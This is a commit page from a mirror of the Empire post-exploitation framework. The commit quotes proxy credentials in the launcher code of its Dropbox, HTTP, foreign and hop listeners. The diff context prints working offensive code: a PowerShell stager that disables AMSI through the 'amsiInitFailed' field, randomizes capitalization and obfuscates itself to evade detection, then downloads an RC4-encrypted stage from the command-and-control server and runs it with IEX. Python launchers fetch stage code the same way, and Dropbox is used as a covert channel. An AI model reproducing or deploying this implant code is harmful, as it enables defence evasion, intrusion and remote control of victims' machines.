infosecn1nja
/
Empire
mirror of https://github.com/infosecn1nja/Empire.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #728 from dirkjanm/dev 

Fixed custom proxy config in launcher code
websockets-multiuser
Steve Borosh 2017-09-30 11:31:15 -04:00 committed by GitHub
parent eae352903c effe3954e1
commit 223079597c
4 changed files with 32 additions and 32 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
lib/listeners/dbx.py
View File

@ -222,7 +222,7 @@ class Listener:
password = proxyCreds.split(':')[1] password = proxyCreds.split(':')[1]
domain = username.split('\\')[0] domain = username.split('\\')[0]
usr = username.split('\\')[1] usr = username.split('\\')[1]
stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");" stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;") stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
#save the proxy settings to use during the entire staging process and the agent #save the proxy settings to use during the entire staging process and the agent
@ -307,7 +307,7 @@ class Listener:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n" launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0] username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1] password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n" launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n" launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else: else:
launcherBase += "o = urllib2.build_opener(proxy);\n" launcherBase += "o = urllib2.build_opener(proxy);\n"
@ -484,7 +484,7 @@ class Listener:
#strip out comments and blank lines #strip out comments and blank lines
code = helpers.strip_python_comments(code) code = helpers.strip_python_comments(code)
#patch some more #patch some more
code = code.replace('delay = 60', 'delay = %s' % (delay)) code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter)) code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile)) code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
@ -661,16 +661,16 @@ def send_message(packets=None):
except: except:
pass pass
if packets: if packets:
data = ''.join(packets) data = ''.join(packets)
# aes_encrypt_then_hmac is in stager.py # aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data) encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData) data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
#check to see if there are any results already present #check to see if there are any results already present
headers['Dropbox-API-Arg'] = "{\\"path\\":\\"%s/%s.txt\\"}" % (resultsFolder, sessionID) headers['Dropbox-API-Arg'] = "{\\"path\\":\\"%s/%s.txt\\"}" % (resultsFolder, sessionID)
try: try:
pkdata = post_message('https://content.dropboxapi.com/2/files/download', data=None, headers=headers) pkdata = post_message('https://content.dropboxapi.com/2/files/download', data=None, headers=headers)
except: except:
@ -953,7 +953,7 @@ def send_message(packets=None):
dbx.files_delete(fileName) dbx.files_delete(fileName)
except dropbox.exceptions.ApiError: except dropbox.exceptions.ApiError:
dispatcher.send("[!] Error deleting data at '%s'" % (fileName), sender="listeners/dropbox") dispatcher.send("[!] Error deleting data at '%s'" % (fileName), sender="listeners/dropbox")
self.mainMenu.agents.handle_agent_data(stagingKey, responseData, listenerOptions) self.mainMenu.agents.handle_agent_data(stagingKey, responseData, listenerOptions)

28
lib/listeners/http.py
View File

@ -243,7 +243,7 @@ class Listener:
password = proxyCreds.split(':')[1] password = proxyCreds.split(':')[1]
domain = username.split('\\')[0] domain = username.split('\\')[0]
usr = username.split('\\')[1] usr = username.split('\\')[1]
stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");" stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;") stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
#save the proxy settings to use during the entire staging process and the agent #save the proxy settings to use during the entire staging process and the agent
@ -259,7 +259,7 @@ class Listener:
if "https" in host: if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port) host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else: else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port) host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array # code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(") stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
@ -296,7 +296,7 @@ class Listener:
# decode everything and kick it over to IEX to kick off execution # decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX") stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate: if obfuscate:
stager = helpers.obfuscate(stager, obfuscationCommand=obfuscationCommand) stager = helpers.obfuscate(stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it # base64 encode the stager and return it
@ -338,7 +338,7 @@ class Listener:
# prebuild the request routing packet for the launcher # prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='') routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket) b64RoutingPacket = base64.b64encode(routingPacket)
launcherBase += "req=urllib2.Request(server+t);\n" launcherBase += "req=urllib2.Request(server+t);\n"
# add the RC4 packet to a cookie # add the RC4 packet to a cookie
launcherBase += "req.add_header('User-Agent',UA);\n" launcherBase += "req.add_header('User-Agent',UA);\n"
@ -352,7 +352,7 @@ class Listener:
#launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue) #launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue) launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none": if proxy.lower() != "none":
if proxy.lower() == "default": if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n" launcherBase += "proxy = urllib2.ProxyHandler();\n"
@ -367,7 +367,7 @@ class Listener:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n" launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0] username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1] password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n" launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n" launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else: else:
launcherBase += "o = urllib2.build_opener(proxy);\n" launcherBase += "o = urllib2.build_opener(proxy);\n"
@ -378,7 +378,7 @@ class Listener:
launcherBase += "urllib2.install_opener(o);\n" launcherBase += "urllib2.install_opener(o);\n"
# download the stager and extract the IV # download the stager and extract the IV
launcherBase += "a=urllib2.urlopen(req).read();\n" launcherBase += "a=urllib2.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];" launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];" launcherBase += "data=a[4:];"
@ -419,8 +419,8 @@ class Listener:
if not language: if not language:
print helpers.color('[!] listeners/http generate_stager(): no language specified!') print helpers.color('[!] listeners/http generate_stager(): no language specified!')
return None return None
profile = listenerOptions['DefaultProfile']['Value'] profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')] uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value'] launcher = listenerOptions['Launcher']['Value']
@ -475,7 +475,7 @@ class Listener:
randomizedStager += helpers.randomize_capitalization(line) randomizedStager += helpers.randomize_capitalization(line)
else: else:
randomizedStager += line randomizedStager += line
if obfuscate: if obfuscate:
randomizedStager = helpers.obfuscate(randomizedStager, obfuscationCommand=obfuscationCommand) randomizedStager = helpers.obfuscate(randomizedStager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it # base64 encode the stager and return it
@ -638,7 +638,7 @@ class Listener:
if($Script:Proxy) { if($Script:Proxy) {
$wc.Proxy = $Script:Proxy; $wc.Proxy = $Script:Proxy;
} }
$wc.Headers.Add("User-Agent",$script:UserAgent) $wc.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)} $script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)}
$wc.Headers.Add("Cookie", "session=$RoutingCookie") $wc.Headers.Add("Cookie", "session=$RoutingCookie")
@ -680,7 +680,7 @@ class Listener:
if($Script:Proxy) { if($Script:Proxy) {
$wc.Proxy = $Script:Proxy; $wc.Proxy = $Script:Proxy;
} }
$wc.Headers.Add('User-Agent', $Script:UserAgent) $wc.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)} $Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}
@ -783,7 +783,7 @@ def send_message(packets=None):
app = Flask(__name__) app = Flask(__name__)
self.app = app self.app = app
@app.route('/<string:stagerURI>') @app.route('/<string:stagerURI>')
def send_stager(stagerURI): def send_stager(stagerURI):
if stagerURI: if stagerURI:
@ -987,4 +987,4 @@ def send_message(packets=None):
self.threads[name].kill() self.threads[name].kill()
else: else:
print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])) print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
self.threads[self.options['Name']['Value']].kill() self.threads[self.options['Name']['Value']].kill()

14
lib/listeners/http_foreign.py
View File

@ -141,7 +141,7 @@ class Listener:
uris = [a for a in profile.split('|')[0].split(',')] uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris) stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:] customHeaders = profile.split('|')[2:]
if language.startswith('po'): if language.startswith('po'):
# PowerShell # PowerShell
@ -164,7 +164,7 @@ class Listener:
stager += "'amsiInitFailed','NonPublic,Static'" stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};") stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;") stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default': if userAgent.lower() == 'default':
@ -198,7 +198,7 @@ class Listener:
password = proxyCreds.split(':')[1] password = proxyCreds.split(':')[1]
domain = username.split('\\')[0] domain = username.split('\\')[0]
usr = username.split('\\')[1] usr = username.split('\\')[1]
stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");" stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;") stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
# TODO: reimplement stager retries? # TODO: reimplement stager retries?
@ -210,7 +210,7 @@ class Listener:
headerValue = header.split(':')[1] headerValue = header.split(':')[1]
stager += helpers.randomize_capitalization("$wc.Headers.Add(") stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue) stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# code to turn the key string into a byte array # code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(") stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey) stager += "'%s');" % (stagingKey)
@ -294,7 +294,7 @@ class Listener:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n" launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0] username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1] password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n" launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n" launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else: else:
launcherBase += "o = urllib2.build_opener(proxy);\n" launcherBase += "o = urllib2.build_opener(proxy);\n"
@ -363,12 +363,12 @@ class Listener:
if language: if language:
if language.lower() == 'powershell': if language.lower() == 'powershell':
updateServers = """ updateServers = """
$Script:ControlServers = @("%s"); $Script:ControlServers = @("%s");
$Script:ServerIndex = 0; $Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value']) """ % (listenerOptions['Host']['Value'])
getTask = """ getTask = """
function script:Get-Task { function script:Get-Task {

8
lib/listeners/http_hop.py
View File

@ -176,7 +176,7 @@ class Listener:
password = proxyCreds.split(':')[1] password = proxyCreds.split(':')[1]
domain = username.split('\\')[0] domain = username.split('\\')[0]
usr = username.split('\\')[1] usr = username.split('\\')[1]
stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");" stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;") stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
# TODO: reimplement stager retries? # TODO: reimplement stager retries?
@ -247,7 +247,7 @@ class Listener:
# add the RC4 packet to a cookie # add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (b64RoutingPacket) launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (b64RoutingPacket)
launcherBase += "import urllib2\n" launcherBase += "import urllib2\n"
if proxy.lower() != "none": if proxy.lower() != "none":
if proxy.lower() == "default": if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n" launcherBase += "proxy = urllib2.ProxyHandler();\n"
@ -262,7 +262,7 @@ class Listener:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n" launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0] username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1] password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n" launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n" launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else: else:
launcherBase += "o = urllib2.build_opener(proxy);\n" launcherBase += "o = urllib2.build_opener(proxy);\n"
@ -271,7 +271,7 @@ class Listener:
#install proxy and creds globally, so they can be used with urlopen. #install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib2.install_opener(o);\n" launcherBase += "urllib2.install_opener(o);\n"
# download the stager and extract the IV # download the stager and extract the IV
launcherBase += "a=o.open(server+t).read();" launcherBase += "a=o.open(server+t).read();"
launcherBase += "IV=a[0:4];" launcherBase += "IV=a[0:4];"